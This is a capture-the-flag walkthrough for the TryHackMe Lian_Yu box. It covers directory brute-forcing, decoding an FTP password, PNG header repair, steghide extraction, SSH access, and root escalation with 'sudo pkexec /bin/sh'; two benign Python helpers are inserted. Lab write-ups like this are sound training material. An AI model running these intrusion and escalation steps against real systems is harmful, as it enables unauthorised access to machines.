Challenges: Lian_Yu (TryHackMe)

Welcome to Lian_YU, a beginner-friendly CTF box with an Arrowverse theme. While the storyline and references might feel familiar to fans of the Arrow series, prior knowledge isn't required to complete the challenge. The goal is simple: enumerate thoroughly, discover hidden paths, and uncover the user and root flags.
This box walks you through essential pentesting skills: web directory brute-forcing, decoding credentials, FTP file analysis, steganography, and privilege escalation through a common misconfiguration. Each step simulates a real-world attack vector and is well suited to learners building foundational red-teaming skills.
Find the Flags
Welcome to Lian_YU, this Arrowverse themed beginner CTF box! Capture the flags and have fun.
Answer the questions below
Deploy the VM and Start the Enumeration.
Starting off with enumeration using nmap and gobuster:
nmap -sV IP_Address
gobuster dir -u IP_Address -w /usr/share/wordlists/dirb/common.txt
From the site, though not much help:
Note: Hi Everyone, I am a huge fan of Arrowverse, I built this vm concept based on Arrow (first season) you will find a few things similar here and I posted this Content here just to entertain you, To complete this CTF it isn't mandatory to have knowledge on Arrowverse series. I hope you will Enjoy the content and have fun :).
Figured out that we need to try a different wordlist with gobuster, which revealed a path called /island:
gobuster dir -u IP_Address -w /usr/share/wordlists/dirb/big.txt
On that path a name, vigilante, was revealed, which will be important later when we look for our flag.
Trying another wordlist to find the next folder:
What is the Web Directory you found?
gobuster dir -u http://IP_Address/island -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
Browsing to that folder on the site reveals a hint:
what is the file name you found?
We'll use the -x flag on gobuster to search for files with the hinted extension:
gobuster dir -u http://IP_Address/island/2100 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -x .ticket
Browsing to that file on the site, we find an encoded string which will be the FTP password.
what is the FTP Password?
Decoding it as Base58 in CyberChef gives the FTP password.
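As an added illustration of that step (not part of the original writeup), a small Base58 codec in Python using the Bitcoin alphabet that most tools, CyberChef included, use by default; the helper shows why a string gets tried as Base58 rather than Base64 (no 0, O, I, l, +, / or =). The sample strings are constructed here, not the challenge value.

```python
# Bitcoin-style Base58 alphabet: digits and letters without 0, O, I and l.
ALPHABET = b"123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def looks_like_base58(s: str) -> bool:
    """Quick triage: every character must be in the Base58 alphabet."""
    return bool(s) and all(ch in ALPHABET for ch in s.encode())


def b58decode(s: str) -> bytes:
    """Treat the string as a base-58 number; each leading '1' is a leading zero byte."""
    n = 0
    for ch in s.encode():
        idx = ALPHABET.find(ch)
        if idx < 0:
            raise ValueError(f"invalid Base58 character: {chr(ch)!r}")
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    pad = len(s) - len(s.lstrip("1"))
    return b"\x00" * pad + body


def b58encode(data: bytes) -> str:
    """Inverse of b58decode: repeated divmod by 58, leading zero bytes become '1'."""
    n = int.from_bytes(data, "big")
    digits = bytearray()
    while n:
        n, rem = divmod(n, 58)
        digits.append(ALPHABET[rem])
    pad = len(data) - len(data.lstrip(b"\x00"))
    return (b"1" * pad + bytes(reversed(digits))).decode()


if __name__ == "__main__":
    # Constructed sample, not the value from the box.
    sample = "StV1DL6CwTryKyV"
    print(looks_like_base58(sample), b58decode(sample))
```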
With the password and the user vigilante from earlier, we log in to FTP and pull down the files stored there.
There's one file called .other_user which reveals a user called slade; this will be relevant later. The file's contents:
Slade Wilson was 16 years old when he enlisted in the United States Army, having lied about his age. After serving a stint in Korea, he was later assigned to Camp Washington where he had been promoted to the rank of major. In the early 1960s, he met Captain Adeline Kane, who was tasked with training young soldiers in new fighting techniques in anticipation of brewing troubles taking place in Vietnam. Kane was amazed at how skilled Slade was and how quickly he adapted to modern conventions of warfare. She immediately fell in love with him and realized that he was without a doubt the most able-bodied combatant that she had ever encountered. She offered to privately train Slade in guerrilla warfare. In less than a year, Slade mastered every fighting form presented to him and was soon promoted to the rank of lieutenant colonel. Six months later, Adeline and he were married and she became pregnant with their first child. The war in Vietnam began to escalate and Slade was shipped overseas. In the war, his unit massacred a village, an event which sickened him. He was also rescued by SAS member Wintergreen, to whom he would later return the favor. Chosen for a secret experiment, the Army imbued him with enhanced physical powers in an attempt to create metahuman super-soldiers for the U.S. military. Deathstroke became a mercenary soon after the experiment when he defied orders and rescued his friend Wintergreen, who had been sent on a suicide mission by a commanding officer with a grudge. However, Slade kept this career secret from his family, even though his wife was an expert military combat instructor. A criminal named the Jackal took his younger son Joseph Wilson hostage to force Slade to divulge the name of a client who had hired him as an assassin. Slade refused, claiming it was against his personal honor code. He attacked and killed the kidnappers at the rendezvous.
Unfortunately, Joseph's throat was slashed by one of the criminals before Slade could prevent it, destroying Joseph's vocal cords and rendering him mute. After taking Joseph to the hospital, Adeline was enraged at his endangerment of her son and tried to kill Slade by shooting him, but only managed to destroy his right eye. Afterwards, his confidence in his physical abilities was such that he made no secret of his impaired vision, marked by his mask which has a black, featureless half covering his lost right eye. Without his mask, Slade wears an eyepatch to cover his eye.
Tried tools like strings, steghide and binwalk to find hints in the images, but they didn't help at first. The Leave_me_alone.png file needed to be fixed: its header was wrong. Inspect it with hexedit, make a copy, and edit the copy:
hexedit Leave_me_alone.png
cp Leave_me_alone.png fixed.png
hexedit fixed.png
We change the first 8 bytes to the correct PNG file signature:
58 45 6F AE 0A 0D 1A 0A
→ 89 50 4E 47 0D 0A 1A 0A
Open fixed.png in your file browser to see what it reveals:
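The same header repair scripted in Python, as an added example that is not from the original writeup: it rewrites the 8-byte signature and then checks that the IHDR chunk right behind it has a valid CRC, which tells you whether the signature was the only damage. The sample file is constructed inline for demonstration; the real file is the one pulled from FTP.

```python
import struct
import sys
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"  # 89 50 4E 47 0D 0A 1A 0A


def has_valid_signature(data: bytes) -> bool:
    """True when the first 8 bytes are the fixed PNG signature."""
    return data[:8] == PNG_SIGNATURE


def repair_signature(data: bytes) -> bytes:
    """Overwrite the first 8 bytes with the real signature, leaving the rest untouched."""
    if len(data) < 8:
        raise ValueError("file too short to be a PNG")
    return PNG_SIGNATURE + data[8:]


def first_chunk_is_sound(data: bytes) -> bool:
    """The first chunk must be a 13-byte IHDR whose stored CRC matches the
    CRC over its type and body; if this fails, more than the header was damaged."""
    if len(data) < 8 + 4 + 4 + 13 + 4:
        return False
    length, ctype = struct.unpack(">I4s", data[8:16])
    if ctype != b"IHDR" or length != 13:
        return False
    body = data[16:16 + length]
    stored_crc = struct.unpack(">I", data[16 + length:20 + length])[0]
    return zlib.crc32(ctype + body) == stored_crc


def build_sample(corrupt: bool) -> bytes:
    """Constructed 1x1 RGB PNG header for demonstration; not the challenge file."""
    ihdr_body = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    crc = struct.pack(">I", zlib.crc32(b"IHDR" + ihdr_body))
    ihdr = struct.pack(">I", 13) + b"IHDR" + ihdr_body + crc
    # The damaged signature seen on the box: "XEo" plus a scrambled line-ending block.
    sig = bytes.fromhex("58456FAE0A0D1A0A") if corrupt else PNG_SIGNATURE
    return sig + ihdr


if __name__ == "__main__":
    # Usage: python png_fix.py Leave_me_alone.png fixed.png
    src, dst = sys.argv[1], sys.argv[2]
    with open(src, "rb") as f:
        data = f.read()
    fixed = repair_signature(data)
    print("signature was valid:", has_valid_signature(data))
    print("IHDR ok after repair:", first_chunk_is_sound(fixed))
    with open(dst, "wb") as f:
        f.write(fixed)
```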
Now we can move ahead and use steghide to extract the file hidden inside aa.jpg:
steghide --extract -sf aa.jpg
ls
unzip ss.zip
What is the file name with the SSH password?
cat passwd.txt
cat shado
user.txt
We'll use SSH with the revealed password and the slade username to get our initial low-privilege access and the user flag:
find / -type f -name user.txt 2>/dev/null
root.txt
Checking what this user is permitted to run with sudo showed us the way to escalate privileges to the root user:
sudo -l
sudo pkexec /bin/sh
find / -type f -name root.txt 2>/dev/null
The Lian_YU box was a rewarding challenge that covered multiple techniques across the kill chain. It emphasized the importance of enumeration, creative wordlist usage, basic steganography (e.g. header repair), and privilege escalation via pkexec, a known SUID binary, which this user was also allowed to run through sudo.
Throughout the journey, we leveraged tools like Gobuster, Steghide, Hydra, and Hexedit, and practiced reading clues from both the application and underlying system. By combining careful analysis with patience and practical tooling, we successfully captured the user and root flags.
This CTF serves as an excellent training ground for anyone aiming to build real-world penetration testing skills. Whether you're prepping for a certification or sharpening your enumeration game, Lian_YU is a solid step forward.
Written by

Jebitok